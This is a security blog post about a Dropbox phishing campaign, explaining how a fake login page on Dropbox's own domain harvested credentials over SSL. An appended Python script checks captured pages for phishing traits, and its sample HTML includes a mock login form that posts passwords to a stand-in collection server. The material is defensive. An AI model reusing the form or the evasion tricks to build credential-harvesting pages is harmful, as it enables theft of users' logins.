Phishing attacks are commonplace nowadays. While many of them are amateurish, a recent Dropbox phishing attack is anything but poorly designed. The author of this campaign came up with a clever idea, following in the footsteps of a predecessor who pulled off a similar scam using Google Docs and Drive.
HOW DOES THIS PHISHING CAMPAIGN DIFFER FROM THE REST?
According to Symantec, the scam email arrives in the victim's mailbox with the subject "important." The email claims that the victim has been sent a large file that cannot be delivered by email for security reasons, and asks the recipient to pick it up by clicking a link, which leads to a fake Dropbox login page. Here is where it gets tricky: the fake login page is hosted on Dropbox's own user content domain, in exactly the same way as any other file a user uploads to Dropbox. The page is therefore served over SSL, just like any other file hosted on Dropbox, which further reinforces the victim's trust in it.
There is one major difference between this login page and the real Dropbox page: the fake page also shows icons of popular web-based email services, including Gmail and Yahoo Mail, to suggest to victims that they can log in with those credentials as well. Once the user clicks the Sign in button, the credentials are submitted to a compromised web server, again over SSL. This is another critical point in the attack: a form on an HTTPS page that posted to a plain HTTP server would trigger a browser warning about the insecure submission, and the attack's effectiveness would drop sharply.
The page did contain some non-SSL resources, such as images and style sheets. Users of modern web browsers might have seen a warning that the page contains insecure (mixed) content, but most users likely did not know what that means and dismissed the warning. Dropbox has since taken the page down.
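The three traits described above (a password form on a page served from a file-hosting domain, a form action that posts the credentials to a different host over HTTPS, and mixed content loaded over plain HTTP) are all visible in the page's HTML. The following Python example is added here and is not code from the article, from Symantec or from LIFARS: it triages a captured login page for exactly those traits. The hosting URL, the collection server and the HTML sample are constructed assumptions, not the real campaign's identifiers.

```python
"""Triage a captured login page for the phishing traits described in the text.

Added example; not tooling from the original article. All URLs and the sample
HTML are constructed for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed: stand-ins for the file-hosting user-content domain and the
# compromised server that receives the submitted credentials.
PAGE_URL = "https://files.example-hosting.test/u/123456/dropbox/index.html"

SAMPLE_PAGE = """
<html><head>
<link rel="stylesheet" href="http://cdn.example.test/dropbox.css">
</head><body>
<img src="http://cdn.example.test/logo.png">
<form method="post" action="https://compromised.example.test/collect.php">
  <input type="email" name="login">
  <input type="password" name="passwd">
  <button type="submit">Sign in</button>
</form>
<img src="/static/gmail.png"> <img src="/static/yahoo.png">
</body></html>
"""


class LoginPageAudit(HTMLParser):
    """Collects form actions, password inputs and sub-resource URLs."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []            # absolute action URL of every <form>
        self.password_fields = 0
        self.resources = []        # absolute URLs of images, scripts, stylesheets

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # An empty or missing action posts back to the page's own URL.
            self.forms.append(urljoin(self.page_url, a.get("action") or ""))
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1
        elif tag in ("img", "script") and a.get("src"):
            self.resources.append(urljoin(self.page_url, a["src"]))
        elif tag == "link" and a.get("href"):
            self.resources.append(urljoin(self.page_url, a["href"]))


def audit_login_page(page_url, html):
    """Return the raw findings for one page: counts and offending URLs."""
    parser = LoginPageAudit(page_url)
    parser.feed(html)
    page = urlsplit(page_url)
    # Form actions whose host differs from the host serving the page.
    cross_origin = [u for u in parser.forms if urlsplit(u).hostname != page.hostname]
    # Sub-resources fetched over plain HTTP from an HTTPS page (mixed content).
    mixed = [u for u in parser.resources
             if page.scheme == "https" and urlsplit(u).scheme == "http"]
    return {
        "password_fields": parser.password_fields,
        "cross_origin_form_actions": cross_origin,
        "credential_exfil_over_tls": [u for u in cross_origin
                                      if urlsplit(u).scheme == "https"],
        "mixed_content": mixed,
    }


def phishing_indicators(report):
    """Translate findings into the indicators an analyst would report."""
    flags = []
    if report["password_fields"] and report["cross_origin_form_actions"]:
        flags.append("password form posts to a different host")
    if report["credential_exfil_over_tls"]:
        flags.append("credentials leave over HTTPS (no insecure-submission warning)")
    if report["mixed_content"]:
        flags.append("mixed content: %d plain-HTTP resources" % len(report["mixed_content"]))
    return flags


if __name__ == "__main__":
    findings = audit_login_page(PAGE_URL, SAMPLE_PAGE)
    for line in phishing_indicators(findings):
        print("-", line)
```

The host comparison is deliberately coarse: legitimate sites sometimes post a login form to a separate authentication host, so a cross-origin action is a signal to investigate rather than a verdict on its own. The combination of all three indicators on a page served from a file-sharing domain is what the campaign above looks like in practice.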
About the author
LIFARS is the global leader in Digital Forensics and Cyber Resiliency Services. Our experience spans two decades working on high profile events, often in concert with Law Enforcement Agencies around the world. Our proprietary methodology derives directly and indirectly from our experience working with and for U.S. Intelligence Agencies, Interpol, Europol, and NATO. We are solely dedicated to Cyber Resiliency and thus pay close attention to all aspects of our clients' engagement experience while providing a strategic and integrated array of services to minimize risk and disruption while protecting your brand.